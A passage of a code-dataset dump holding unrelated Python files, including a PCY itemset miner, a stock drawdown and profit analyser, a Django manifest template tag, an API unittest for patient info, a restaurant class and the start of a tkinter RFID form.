FreqPairs.append((tuple1[0]+\",\"+tuple1[1]))\n if FreqPairs:\n print (\"Frequent Itemsets of size 2\")\n for item in sorted(FreqPairs):\n print(item)\n return FreqPairs\n\ndef Gen_pcy(type_of_data,SingleWords,IncreasingList):\n min_support=int(sys.argv[2])\n print(\"\\n\")\n large_data_list=[] \n Resultant_List=[]\n for w1 in SingleWords:\n for w2 in IncreasingList:\n if w1 not in w2:\n holder=[]\n holder.append((w1+\",\"+w2))\n large_data_list.append(sorted(holder[0].split(\",\")))\n for bucket_item in large_data_list:\n indicator=1;\n for index in range (0,len(bucket_item)):\n pos=0\n str=\"\"\n while pos=min_support:\n Resultant_List.append(bucket_item)\n Final=[]\n for items in Resultant_List:\n string1=\"\"\n for item in items:\n if string1==\"\":\n string1=string1+item\n else:\n string1=string1+\",\"+item\n Final.append(string1)\n norepeat = []\n [norepeat.append(items) for items in Final if items not in norepeat]\n if norepeat:\n str=\"Frequent Itemsets of size \"\n str+=format(type_of_data)\n print (str)\n for data in norepeat:\n print(data)\n return norepeat\n\nif __name__ == '__main__':\n type_of_data=1\n SingleWords,bitmap=Singles()\n if SingleWords:\n type_of_data+=1\n IncreasingList=Pairs(SingleWords,bitmap)\n type_of_data+=1\n while IncreasingList:\n Received_Data=[]\n Received_Data=Gen_pcy(type_of_data,SingleWords,IncreasingList)\n IncreasingList=Received_Data\n type_of_data+=1 \n","sub_path":"PCY.py","file_name":"PCY.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"203565387","text":"\"\"\" Tests for emitter_utils \"\"\"\nfrom ast import Attribute, Call, Expr, Load, Name, Subscript, keyword\nfrom copy import deepcopy\nfrom unittest import TestCase\n\nfrom doctrans.ast_utils import set_value\nfrom doctrans.emitter_utils import interpolate_defaults, parse_out_param\nfrom doctrans.pure_utils import rpartial\nfrom doctrans.tests.mocks.argparse import argparse_add_argument_ast, argparse_func_ast\nfrom doctrans.tests.mocks.ir import intermediate_repr\nfrom doctrans.tests.utils_for_tests import unittest_main\n\n\nclass TestEmitterUtils(TestCase):\n \"\"\" Test class for emitter_utils \"\"\"\n\n def test_parse_out_param(self) -> None:\n \"\"\" Test that parse_out_param parses out the right dict \"\"\"\n self.assertDictEqual(\n parse_out_param(\n next(filter(rpartial(isinstance, Expr), argparse_func_ast.body[::-1]))\n )[1],\n # Last element:\n intermediate_repr[\"params\"][\"data_loader_kwargs\"],\n )\n\n def test_parse_out_param_default(self) -> None:\n \"\"\" Test that parse_out_param sets default when required and unset \"\"\"\n\n self.assertDictEqual(\n parse_out_param(argparse_add_argument_ast)[1],\n {\"default\": 0, \"doc\": None, \"typ\": \"int\"},\n )\n\n def test_parse_out_param_fails(self) -> None:\n \"\"\" Test that parse_out_param throws NotImplementedError when unsupported type given \"\"\"\n self.assertRaises(\n NotImplementedError,\n lambda: parse_out_param(\n Expr(\n Call(\n args=[set_value(\"--num\")],\n func=Attribute(\n Name(\"argument_parser\", Load()),\n \"add_argument\",\n Load(),\n ),\n keywords=[\n keyword(\n arg=\"type\",\n value=Subscript(\n expr_context_ctx=None,\n expr_slice=None,\n expr_value=None,\n ),\n identifier=None,\n ),\n keyword(\n arg=\"required\",\n value=set_value(True),\n identifier=None,\n ),\n ],\n expr=None,\n expr_func=None,\n )\n )\n ),\n )\n\n def test_interpolate_defaults(self) -> None:\n \"\"\" Test that interpolate_defaults corrects sets the default property \"\"\"\n param = \"K\", deepcopy(intermediate_repr[\"params\"][\"K\"])\n param_with_correct_default = deepcopy(param[1])\n del param[1][\"default\"]\n self.assertDictEqual(interpolate_defaults(param)[1], param_with_correct_default)\n\n\nunittest_main()\n","sub_path":"doctrans/tests/test_emitter_utils.py","file_name":"test_emitter_utils.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60464285","text":"\"\"\"\nImplemented algorithms\ndivide and conquer, sorting for computing max drawdown of a stock and multithreading for speeding up computing\nGreedy algorithm for calculating the maximal profit that is made by trading (long one share or not) a stock without commission\nDynamic programming for calculating the maximal profit that is made by trading (long one share or not) a stock with commission\nauthor: Yi Rong\nupdated on 1/25/21\n\"\"\"\n\n\nimport pandas_datareader as web\nimport datetime as dt\nfrom pandas_datareader._utils import RemoteDataError\nimport concurrent.futures\nimport matplotlib.pyplot as plt\n\n\nclass TradeAssistant:\n\n ################## TradeAssistant initialization ##################\n def __init__(self, L_symbol, start, end):\n self.L_symbol = L_symbol\n self.start = start\n self.end = end\n L_data = self.get_raw_data()\n self.dict_raw_data = L_data[0]\n self.L_ts = L_data[1]\n self.fee = 1\n\n def get_raw_data(self):\n \"\"\"\n Download raw data from yahoo finance and return all results in a dictionary\n \"\"\"\n dict_raw_data = {}\n L_ts = []\n for symbol in self.L_symbol:\n try:\n df_symbol = web.get_data_yahoo(symbol, start=self.start, end=self.end)\n dict_raw_data[symbol] = df_symbol['Adj Close'].round(5)\n except RemoteDataError:\n print(\"No data fetched for symbol\" + symbol)\n\n L_ts.append(dict_raw_data[symbol])\n return [dict_raw_data, L_ts]\n\n ################## MDD ##################\n # Step 1\n def get_cummax(self, ts):\n \"\"\"\n Intent: get a cumulative max series and index of max.\n returnL is a list denotes the cumulative max of self.ts and its index, which means\n there are two values in each element. first value is the cumulative max, the second value is its index.\n e.g. self.ts = [10, 9, 8, 9, 12] ==>\n returnL = [[10, 0], [10, 0], [10, 0], [10, 0], [12, 4]]\n\n Precondition: The global variable self.ts is the time series input of this\n function.\n\n Postcondition1: (max) returnL[i][0] >= self.ts[j], for j in [0, i];\n (index) returnL[i][1] <= i;\n i can be any integer among [0, len(self.ts) - 1]\n \"\"\"\n i, i_max = 0, 0\n returnL = []\n cur_max = ts[i]\n while i < len(ts):\n if cur_max < ts[i]:\n cur_max = ts[i]\n i_max = i\n returnL.append([cur_max, i_max])\n i += 1\n return returnL\n\n # Step 2: Divide and Conquer\n def get_mdd_between(self, ts, L_cummax, a_begin, an_end):\n \"\"\"\n Intent: find the minimal value among a drawdown series and the start and end index of the max drawdown using divide and conquer\n\n Shorthand: L = len(ts)\n Precondition 1: ts is a list or a time series of floats\n Precondition 2: L_cummax is a list denotes the cumulative max of ts and its index, which means\n there are two values in each element. first value is the cumulative max, the second value is its index.\n e.g. ts = [10, 9, 8, 9, 12] ==> L_cummax = [[10, 0], [10, 0], [10, 0], [10, 0], [12, 4]]\n e.g. ts & L_cummax ==> returnL = [0, 2, -20%]\n Pre3: 0 <= a_begin < L\n\n Postcondition 1 (Subsequence): 0 <= returnL[0] <= returnL[1] < L\n Post2 (L_cummax): L_cummax[a_begin][1] <= a_begin\n Post3 (Minimal): returnL[2] is minimal\n Post4 (max drawdown Constraint): 0 >= returnL[2] >= -1\n \"\"\"\n\n returnL = [None] * 3\n\n \"\"\"\n ===Sa (Solvable Immediately?):\n an_end_index = a_begin_index & Postcondition 1-3 & this returned\n –XOR–\n mid = int((a_begin + an_end) / 2) \n \"\"\"\n if a_begin == an_end: # immediately satisfy all postconditions\n returnL[0] = L_cummax[a_begin][1]\n returnL[1] = a_begin\n returnL[2] = ts[a_begin] / L_cummax[a_begin][0] - 1\n return returnL\n else:\n mid = int((a_begin + an_end) / 2)\n\n # ===Sb1: Postcondition holds on a_list[:mid+1]?\n left_res = self.get_mdd_between(ts, L_cummax, a_begin, mid)\n\n # ===Sb2: Postcondition holds on a_list[mid+1:]\n right_res = self.get_mdd_between(ts, L_cummax, mid + 1, an_end)\n\n # ===Sc (Conquered) = Postconditions\n\n # Satisfy Pos3\n if left_res[2] < right_res[2]:\n return left_res\n\n else:\n return right_res\n\n # Greedy algorithm\n def get_max_profit(self, ts):\n \"\"\"\n intent: get the maximal profit that can be made by making transactions based on a time series stock price data,\n there is no limit on the number transactions, but you can only hold one or zero share of stock at any time\n Precondition1: ts is a list or a time series of floats\n Precondition2 (positive price): ts[i] > 0 for all i\n\n Postcondition1: return_res >= 0\n Postcondition2: return_res is maximal\n \"\"\"\n\n #Sa: ts is an empty list, 0 is returned\n if len(ts) == 0:\n return 0\n\n #Sb (Parts): return_res is the solution for ts[:i] for i in [1, len(ts)]\n #Sc (Greed used): return_res starts from 0 and will add positive difference: ts[i] - ts[i - 1], i in [1, len(ts))\n #Example: ts = [1, 3, 2, 4, 3],\n # lag(ts)= [1, 3, 2, 4]\n #differences = [2,-1, 2,-1], so return_res = 0 + 2 + 2\n return_res = 0\n for i in range(1, len(ts)):\n if ts[i] - ts[i - 1] > 0:\n return_res += (ts[i] - ts[i - 1])\n\n # Sd: i is maximal, return_res is divided by the first-day price to make it a profit ratio\n return_res = return_res / ts[0]\n return return_res\n\n # DP\n def get_max_profit_with_transactionfee(self, ts):\n \"\"\"\n intent: get the maximal profit that can be made by making transactions based on a time series stock price data,\n you can only hold one or zero share of stock at any time and you need to pay a transaction fee for each transaction,\n buy and sell refer to one transaction.\n Precondition1: ts is a list or a time series of floats\n Precondition2 (positive price): ts[i] > 0 for all i\n Precondition3 (positive fee): self.fee is a float number and fee > 0\n\n Postcondition1: return_res >= 0\n Postcondition2: return_res is maximal\n \"\"\"\n\n #Sa: ts is an empty list, 0 is returned\n if len(ts) == 0:\n return 0\n\n #Sb: cash_ is the profit that we hold cash instead of holding stock, hold_ is the profit that we hold stock\n # cash_ and hold_ are initialized for the first day\n cash_ = 0\n hold_ = -ts[0]\n\n # aProblem = The maximal profit of holding cash or a stock that is transited from the last cash_ and hold_.\n def _getDPSol(cash_, hold_):\n \"\"\"\n Precondition1: the solution for each day is between cash_ and hold_, which are knownS\n\n Postcondition1: knownS contains a solution for aProblem\n \"\"\"\n #Sa (transition): on day i, the max profit of holding cash or a stock is transitted from day i -1.\n for i in range(1, len(ts)):\n # Sb1: on day i, our max profit of holding cash can be determined between keeping cash or selling a stock\n # keep cash, sell stock and pay transaction fee\n cash_ = max(cash_, hold_ + ts[i] - self.fee)\n # Sb2: on day i, our max profit of holding a stock can be determined between keeping the stock or buying a stock\n # keep stock, buy a stock\n hold_ = max(hold_, cash_ - ts[i])\n\n # Sc (completed): on the last day, cash_ is the solution\n return cash_\n\n # Sc: the max profit is divided by the first-day price to make it a profit ratio\n return_res = _getDPSol(cash_, hold_) / ts[0]\n return return_res\n\n\n def get_analysis(self, ts):\n \"\"\"\n intent: combine get_cummax, get_mdd_between, get_max_profit in one function so that this function can be used in multithreading\n\n Precondition 1: ts is a list or a time series of floats\n\n Postcondition 1 (Subsequence): 0 <= returnL[0] <= returnL[1] < L\n Post2 (Minimal): returnL[2] is minimal\n Post3 (max drawdown Constraint): 0 >= returnL[2] >= -1\n \"\"\"\n L_cummax = self.get_cummax(ts)\n return_res = self.get_mdd_between(ts, L_cummax, 0, (len(L_cummax) - 1))\n return_res.append(self.get_max_profit(ts))\n return_res.append(self.get_max_profit_with_transactionfee(ts))\n\n return return_res\n\n def do_multithreading(self):\n \"\"\"\n intent: get max drawdown results for multiple time series using multithreading\n\n Precondition 1: self.L_ts is a list, its element is a time series of floats\n Pre2: self.get_analysis is a function that can get analysis results like\n max drawdown, max profit, max profit with transaction feefor each element in self.L_ts\n\n Postcondition 1: len(return_L_mdd) = len(self.L_ts)\n Post2: the order of return_L_mdd should be the same as self.L_ts, which is also the order of self.L_symbol\n Post3: each list element of return_L_mdd has its corresponding symbol as the fourth element.\n return_L_mdd[i][3] = self.L_symbol[i] for i in [0, len(self.L_ts) - 1]\n \"\"\"\n with concurrent.futures.ThreadPoolExecutor() as executor:\n # ---S1 Thread self.get_analysis(self.L_ts[0]) started, which attains results_[0] = self.get_analysis(self.L_ts[0])\n # ---S2 Thread self.get_analysis(self.L_ts[1]) started, which attains results_[1] = self.get_analysis(self.L_ts[1])\n # ...\n # ---Sn Thread self.get_analysis(self.L_ts[n - 1]) started, which attains results_[n - 1] = self.get_analysis(self.L_ts[n - 1])\n # ---Total number of len(self.L_ts) threads started\n results_ = executor.map(self.get_analysis, self.L_ts)\n \"\"\"\n executor.map will start threads recursively for each element in self.L_ts and put it in function self.get_analysis.\n One advantage of this function is the return results_ will have the same order as self.L_ts, rather than the order based on computaional efficiency.\n \"\"\"\n # ---Sn+1: Threads in S1, S2, ..., Sn completed\n # ---Sn+2: results_[i] = self.get_analysis(self.L_ts[i]) for i in [0, len(self.L_ts) - 1]\n\n # ---Sn+3: for each list element in results_, add its corresponding symbol as the fourth element in the list element\n return_L_mdd = []\n for i, result in enumerate(results_):\n result.append(self.L_symbol[i])\n return_L_mdd.append(result)\n\n return return_L_mdd\n\n def merge_sort(self, a_list, col):\n \"\"\"\n intent: a_list is a list in which each element is a list, this function will sort the a_list based on a certain element is the list element, which refers to a_list[i][col] for i in [0, len(a_list) - 1]\n\n precondition1: len(a_list) < 0\n pre2: len(a_list[i]) is the same for i in [0, len(a_list) - 1] and len(a_list[i]) >= (col + 1)\n pre3: -1 <= a_list[i][col] <= 0 for i in [0, len(a_list) - 1]\n\n postcondition1: return_list will be a sorted version of a_list, which means if len(return_list) > 2\n return_list[i][col] <= return_list[i + 1][col] <= return_list[i + 2][col] <= ...\n post2: return_list is the same multiset of a_list\n \"\"\"\n\n # ---Sa (Solvable Immediately?):\n # len(a_list) == 1 & Postconditions & This returned\n # –XOR–\n # mid = int(len(a_list) / 2)\n\n # if not immediately satisfy all postconditions?\n if len(a_list) > 1:\n\n # then\n mid = int(len(a_list) / 2)\n\n # ---Sb1: Postconditions hold on a_list[:mid]\n left = a_list[:mid].copy()\n self.merge_sort(left, col)\n\n # ---Sb2: Postconditions hold on a_list[mid:]\n right = a_list[mid:].copy()\n self.merge_sort(right, col)\n\n # ---Sc (Conquered) = Postconditions\n l = 0 # index in left\n r = 0 # index in right\n k = 0 # index in a_list and a_list[:mid] = left, a_list[mid:] = right\n\n # ---Sc1 (some sorted): a_list[:k] is sorted when l < len(left) and r < len(right)\n # and k = l + r\n while l < len(left) and r < len(right):\n if left[l][col] <= right[r][col]:\n a_list[k] = left[l]\n l += 1\n k += 1\n else:\n a_list[k] = right[r]\n r += 1\n k += 1\n\n # ---Sc2 (some sorted): a_list[:k] is sorted when r = len(right), which means all elements in right is sorted and placed in a_list\n # and k = l + r\n while l < len(left):\n a_list[k] = left[l]\n l += 1\n k += 1\n\n # ---Sc3 (some sorted): a_list[:k] is sorted when l = len(left), which means all elements in left is sorted and placed in a_list\n # and k = l + r\n while r < len(right):\n a_list[k] = right[r]\n r += 1\n k += 1\n\n # ---S4 (Complement): a_list is sorted\n return_list = a_list.copy()\n return return_list\n\n\n\n ################## main ##################\n def main(self):\n L_mdd = self.do_multithreading()\n a_list = self.merge_sort(L_mdd, col=2)\n print(\" Sorted Max Drawdown: \")\n for i, res in enumerate(a_list):\n # pdb.set_trace()\n print(f\"---------------------- No.{i + 1} -------------------------------\")\n print(f\"The max drawdown of {res[-1]} is \" + \"{:.2%}\".format(res[2]))\n print(f\"The max drawdown starts on {str(self.dict_raw_data[res[-1]].index[res[0]])}\")\n print(f\"The max drawdown ends on {str(self.dict_raw_data[res[-1]].index[res[1]])}\")\n print(f\"The max profit can be \" + \"{:.2%}\".format(res[3]))\n print(f\"The max profit with transaction fee $\" + str(self.fee) + \" can be \" + \"{:.2%}\".format(res[4]))\n # self.dict_raw_data[res[3]].plot(color='grey', figsize=(8,4))\n # plt.title(res[3])\n # plt.ylabel(\"Adj Close\")\n #\n # plt.scatter(self.dict_raw_data[res[3]].index[res[0]], self.dict_raw_data[res[3]][res[0]], color='red')\n # plt.scatter(self.dict_raw_data[res[3]].index[res[1]], self.dict_raw_data[res[3]][res[1]], color='red')\n # plt.show()\n\n\nif __name__ == \"__main__\":\n L_symbol = [\"TSLA\", \"FB\", \"NFLX\", \"AMZN\", \"GOOG\"]\n TA = TradeAssistant(L_symbol=L_symbol, start=dt.datetime(2018, 1, 1), end=dt.datetime(2020, 7, 1))\n TA.main()\n","sub_path":"Financial-Application-Python/TradeAssistant.py","file_name":"TradeAssistant.py","file_ext":"py","file_size_in_byte":15197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"582912821","text":"from DOTA_configs.NWPU_VHR_10.a_base_config import *\n\n_base_ = [\n '../_base_/models/faster_rcnn_r50_fpn.py',\n dataset_config,\n '../_base_/schedules/schedule_2x_rs.py',\n '../_base_/default_runtime.py'\n]\n\n# model settings\nmodel = dict(\n roi_head=dict(\n bbox_head=dict(\n num_classes=num_classes)))\n# training and testing settings\n\ntest_cfg = dict(\n rpn=dict(\n nms_across_levels=False,\n nms_pre=6000,\n nms_post=1000,\n max_num=1000,\n nms_thr=0.7,\n min_bbox_size=0),\n rcnn=dict(\n score_thr=0.05,\n nms=dict(type='nms', iou_threshold=0.5),\n max_per_img=max_bbox_per_img))","sub_path":"DOTA_configs/NWPU_VHR_10/faster_rcnn_r50_fpn_2x.py","file_name":"faster_rcnn_r50_fpn_2x.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"603880073","text":"#!/usr/bin/python\n# written by: atholcomb\n# car_rental.py\n# Constructs car class, creating car objects for rent\n# \n# Class has 1 method\n# car_to_rent()\n\ncars_list = ['car1', 'car2', 'car3']\n\ndef car_to_rent(self):\n for index in cars_list:\n print(index[-1])\n select = input(\"Car select 1-3: \")\n if select == 1:\n print(\"You selected Subaru!\")\n if select == 2:\n print(\"You selected Kia!\")\n if select == 3:\n print(\"You selected Audi!\")\n\ncar_to_rent('')\n","sub_path":"classes/car_rental.py","file_name":"car_rental.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"39452686","text":"import json\nimport os\nimport fnmatch\n\nfrom django import template\nfrom django.templatetags.static import StaticNode\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom django.utils.html import conditional_escape\nfrom django.core.validators import URLValidator\nfrom django.core.exceptions import ValidationError\n\n\nfrom manifest_loader.exceptions import WebpackManifestNotFound\n\n\nregister = template.Library()\n\nAPP_SETTINGS = {\n 'output_dir': None,\n 'manifest_file': 'manifest.json',\n 'cache': False\n}\n\nif hasattr(settings, 'MANIFEST_LOADER'):\n APP_SETTINGS.update(settings.MANIFEST_LOADER)\n\n\n@register.tag('manifest')\ndef do_manifest(parser, token):\n return ManifestNode(token)\n\n\n@register.tag('manifest_match')\ndef do_manifest_match(parser, token):\n return ManifestMatchNode(token)\n\n\nclass ManifestNode(template.Node):\n def __init__(self, token):\n bits = token.split_contents()\n if len(bits) < 2:\n raise template.TemplateSyntaxError(\n \"'%s' takes one argument (name of file)\" % bits[0])\n self.bits = bits\n\n def render(self, context):\n manifest_key = get_value(self.bits[1], context)\n manifest = get_manifest()\n manifest_value = manifest.get(manifest_key, manifest_key)\n return make_url(manifest_value, context)\n\n\nclass ManifestMatchNode(template.Node):\n def __init__(self, token):\n self.bits = token.split_contents()\n if len(self.bits) < 3:\n raise template.TemplateSyntaxError(\n \"'%s' takes two arguments (pattern to match and string to \"\n \"insert into)\" % self.bits[0]\n )\n\n def render(self, context):\n urls = []\n search_string = get_value(self.bits[1], context)\n output_tag = get_value(self.bits[2], context)\n\n manifest = get_manifest()\n\n matched_files = [file for file in manifest.keys() if\n fnmatch.fnmatch(file, search_string)]\n mapped_files = [manifest.get(file) for file in matched_files]\n\n for file in mapped_files:\n url = make_url(file, context)\n urls.append(url)\n output_tags = [output_tag.format(match=file) for file in urls]\n return '\\n'.join(output_tags)\n\n\ndef get_manifest():\n cached_manifest = cache.get('webpack_manifest')\n if APP_SETTINGS['cache'] and cached_manifest:\n return cached_manifest\n\n if APP_SETTINGS['output_dir']:\n manifest_path = os.path.join(APP_SETTINGS['output_dir'],\n APP_SETTINGS['manifest_file'])\n else:\n manifest_path = find_manifest_path()\n\n try:\n with open(manifest_path) as manifest_file:\n data = json.load(manifest_file)\n except FileNotFoundError:\n raise WebpackManifestNotFound(manifest_path)\n\n if APP_SETTINGS['cache']:\n cache.set('webpack_manifest', data)\n\n return data\n\n\ndef find_manifest_path():\n static_dirs = settings.STATICFILES_DIRS\n if len(static_dirs) == 1:\n return os.path.join(static_dirs[0], APP_SETTINGS['manifest_file'])\n for static_dir in static_dirs:\n manifest_path = os.path.join(static_dir, APP_SETTINGS['manifest_file'])\n if os.path.isfile(manifest_path):\n return manifest_path\n raise WebpackManifestNotFound('settings.STATICFILES_DIRS')\n\n\ndef is_quoted_string(string):\n if len(string) < 2:\n return False\n return string[0] == string[-1] and string[0] in ('\"', \"'\")\n\n\ndef get_value(string, context):\n if is_quoted_string(string):\n return string[1:-1]\n return context.get(string, '')\n\n\ndef is_url(potential_url):\n validate = URLValidator()\n try:\n validate(potential_url)\n return True\n except ValidationError:\n return False\n\n\ndef make_url(manifest_value, context):\n if is_url(manifest_value):\n url = manifest_value\n else:\n url = StaticNode.handle_simple(manifest_value)\n if context.autoescape:\n url = conditional_escape(url)\n return url\n","sub_path":"manifest_loader/templatetags/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"379337970","text":"\nimport unittest\nfrom json import *\nimport json\nimport paramunittest\nimport readConfig as readConfig\nfrom comm.Log import MyLog\nfrom comm import common\nfrom comm import configHttp as ConfigHttp\nfrom comm import businessCommon\n\nxls = common.get_xls(\"pc.xlsx\", \"患者基本信息保存\") # excel取值\n\nReadConfig = readConfig.ReadConfig()\nconfigHttp = ConfigHttp.ConfigHttp()\ninfo = {}\n\n\n@paramunittest.parametrized(*xls)\nclass saveBaseinfo(unittest.TestCase):\n def setParameters(self, case_name, url, method,nativeProvinceId,nativeProvince,nativeCityId,nativeCity,nativeDistrictId,nativeDistrict,birthplaceProvinceId,birthplaceProvince,birthplaceCityId,birthplaceCity,birthplaceDistrictId,birthplaceDistrict,patientId,id,address,telephone,socialId,socialAddress,nation,isMarriage,homeAddress,workplace,spouseStatus,childrenStatus,fertility,marriageAge,isSmoke,isDrink,isNarcotics,parentStatus,siblingsStatus,isInfection,isHeredopathia, msg, ):\n self.case_name = str(case_name)\n self.url = str(url)\n self.method = str(method)\n self.msg = str(msg)\n self.return_json = None # 返回值\n self.info = None # json结果\n self.nativeProvinceId = str(nativeProvinceId)\n self.nativeProvince = str(nativeProvince)\n self.nativeCityId = str(nativeCityId)\n self.nativeCity = str(nativeCity)\n self.nativeDistrictId = str(nativeDistrictId)\n self.nativeDistrict = str(nativeDistrict)\n self.birthplaceProvinceId = str(birthplaceProvinceId)\n self.birthplaceProvince = str(birthplaceProvince)\n self.birthplaceCityId = str(birthplaceCityId)\n self.birthplaceCity = str(birthplaceCity)\n self.birthplaceDistrictId = str(birthplaceDistrictId)\n self.birthplaceDistrict = str(birthplaceDistrict)\n self.address = str(address)\n #self.telephone = str(telephone)\n self.socialId = str(socialId)\n self.socialAddress = str(socialAddress)\n self.nation = str(nation)\n self.isMarriage = str(isMarriage)\n self.homeAddress = str(homeAddress)\n self.workplace = str(workplace)\n self.spouseStatus = str(spouseStatus)\n self.childrenStatus = str(childrenStatus)\n self.fertility = str(fertility)\n self.marriageAge = str(marriageAge)\n self.isSmoke = str(isSmoke)\n self.isDrink = str(isDrink)\n self.isNarcotics = str(isNarcotics)\n self.parentStatus = str(parentStatus)\n self.siblingsStatus = str(siblingsStatus)\n self.isInfection = str(isInfection)\n self.isHeredopathia = str(isHeredopathia)\n\n def description(self):\n self.case_name\n\n def setUp(self):\n self.log = MyLog.get_log()\n self.logger = self.log.get_logger()\n print(self.case_name + \"测试开始前准备\") # log启动\n\n def testsaveBaseinfo(self):\n # 拼接url,也可以从excel中获取\n # self.url = comm.get_url_from_xml('login')\n configHttp.set_pcurl(self.url)\n print(\"第1步:设置url \" + self.url)\n\n # 设置参数\n patientId = ReadConfig.get_patient('patientid')\n baseinfo_id = ReadConfig.get_patient('baseinfo_id')\n telephone = ReadConfig.get_patient('mobile')\n paramJson = {\"nativeProvinceId\":self.nativeProvinceId,\n \"nativeProvince\":self.nativeProvince,\n \"nativeCityId\":self.nativeCityId,\n \"nativeCity\":self.nativeCity,\n \"nativeDistrictId\":self.nativeDistrictId,\n \"nativeDistrict\":self.nativeDistrict,\n \"birthplaceProvinceId\":self.birthplaceProvinceId,\n \"birthplaceProvince\":self.birthplaceProvince,\n \"birthplaceCityId\":self.birthplaceCityId,\n \"birthplaceCity\":self.birthplaceCity,\n \"birthplaceDistrictId\":self.birthplaceDistrictId,\n \"birthplaceDistrict\":self.birthplaceDistrict,\n \"patientId\":patientId,\n \"id\":baseinfo_id,\n \"address\":self.address,\n \"telephone\":telephone,\n \"socialId\":self.socialId,\n \"socialAddress\":self.socialAddress,\n \"nation\":self.nation,\n \"isMarriage\":self.isMarriage,\n \"homeAddress\":self.homeAddress,\n \"workplace\":self.workplace,\n \"spouseStatus\":self.spouseStatus,\n \"childrenStatus\":self.childrenStatus,\n \"fertility\":self.fertility,\n \"marriageAge\":self.marriageAge,\n \"isSmoke\":self.isSmoke,\n \"isDrink\":self.isDrink,\n \"isNarcotics\":self.isNarcotics,\n \"parentStatus\":self.parentStatus,\n \"siblingsStatus\":self.siblingsStatus,\n \"isInfection\":self.isInfection,\n \"isHeredopathia\":self.isHeredopathia\n }\n data = {\n 'paramJson': str(paramJson)\n }\n\n configHttp.set_data(data)\n print(\"第2步:设置发送请求的参数\")\n print(data)\n\n # 测试接口\n self.return_json = configHttp.post()\n method = self.method\n print(\"第3步:发送请求\\n\\t\\t请求方法:\" + method)\n\n # 校验结果\n self.checkResult()\n print(\"第4步:检查结果\")\n\n def tearDown(self):\n info = self.info\n # 把casename,url,返回值传入log打印\n self.log.build_case_line(self.case_name, self.url, self.return_json.text)\n\n print(\"测试结束,输出log完结\\n\\n\")\n\n # 断言\n def checkResult(self):\n self.info = self.return_json.json()\n # 显示返回结果\n common.show_return_msg(self.return_json)\n self.assertEqual(self.return_json.status_code, 200)\n #self.assertEqual(self.info['responseObject']['responseMessage'], self.msg)\n self.assertEqual(self.info['responseObject']['responseStatus'],True )\n\n#\n# if __name__ == '__main__':\n# unittest.main()\n\n\n\n\n","sub_path":"testCase/pc/Case/saveBaseinfo.py","file_name":"saveBaseinfo.py","file_ext":"py","file_size_in_byte":6180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"649151922","text":"class Restaurant:\n def __init__(self, name, type):\n try:\n r_name = name + '_고객서빙현황로그.txt'\n file = open(r_name, 'r')\n file_number = file.read()\n self.todays_customer = int(file_number)\n file.close()\n except:\n self.todays_customer = 0\n finally:\n self.restauran_name = name\n self.cuisine_type = type\n self.number_served = 0\n\n def describe_restaurant(self):\n print(\"\\n저희레스토랑 명칭은 %s 이고 %s 전문점입니다\" % (self.restauran_name, self.cuisine_type))\n\n def open_restaurant(self):\n print(\"저희 %s 레스토랑 오픈했습니다. 어서오세요\" %self.restauran_name)\n\n def reset_number_served(self):\n check = int(input(\"초기화 옵션 (전체: 1, 당일: 2): \"))\n if check == 1:\n print(\"전체 손님 카운딩을 0으로 초기화 하였습니다\")\n self.todays_customer = 0\n elif check == 2:\n print('당일손님 카운팅을 0으로 초기화 하였습니다.')\n self.todays_customer += self.number_served\n self.number_served = 0\n\n def increment_number_served(self, number):\n print('손님 %s명 들어오셨습니다. 자리를 안내해 드리겠습니다.' % number)\n self.number_served += number\n\n def check_customer_number(self):\n check = int(input(\"누적 고객확인 (전체: 1, 당일: 2): \"))\n if check == 1:\n print(\"전체 손님 총 %d명 손님께서 오셨습니다.\" % self.todays_customer)\n elif check == 2:\n print('당일 손님 %d명 손님께서 오셨습니다.' % self.number_served)\n\n def __del__(self):\n print(self.restauran_name,\"레스토랑 문 닫습니다\")\n self.todays_customer += self.number_served\n num = str(self.todays_customer)\n try:\n r_name = self.restauran_name+'_고객서빙현황로그.txt'\n file = open(r_name, 'w')\n file.write(num)\n file.close()\n except:\n pass\n\nname, type = input(\"레스토랑 이름과 요리 종류를 선택하세요.(공백으로 구분) : \").split()\ncafe = Restaurant(name, type)\ncafe.describe_restaurant()\nopen_close = input(\"레스토랑을 오픈하시겠습니까? (y/n): \")\nif open_close == 'y':\n cafe.open_restaurant()\n while True:\n input_number = input('\\n어서오세요. 몇명이십니까?(초기화:0입력,종료:-1,누적고객 확인:p) : ')\n if input_number == '-1':\n del cafe\n break\n elif input_number == '0':\n cafe.reset_number_served()\n elif input_number == 'p':\n cafe.check_customer_number()\n else:\n cafe.increment_number_served(int(input_number))\n","sub_path":"01_Jump_to_python/5_APP/Exer/cafe_q6.py","file_name":"cafe_q6.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"637872166","text":"from tkinter import*\nfrom tkinter import ttk\nfrom PIL import ImageTk, Image\n\nroot=Tk()\n \n \nclass MainWindow:\n #para widget ng mainform\n def __init__(self,root,*args,**kwargs):\n \n self.root=root\n self.root.title(\"RFID SYSTEM\")\n self.root.geometry(\"1200x700+200+70\")\n self.root.configure(bg=\"#006600\")\n self.root.resizable(False,False)\n\n #para sa background image\n self.image=ImageTk.PhotoImage(file=\"background_win.jpg\")\n self.label=Label(self.root,image=self.image)\n self.label.place(x=0,y=0)\n \n \n\n \n #Function for Main button. para mapunta sa front ung Frame\n def clicked_home():\n self.frame_home.lift()\n \n \n ###Para sa Employee Frame##### \n def clicked_emp():\n self.frame_emp.lift()\n #Mga label sa pag insert ng Data\n self.head_label=Label(self.frame_emp,text=\"Register Employee Information\",\n 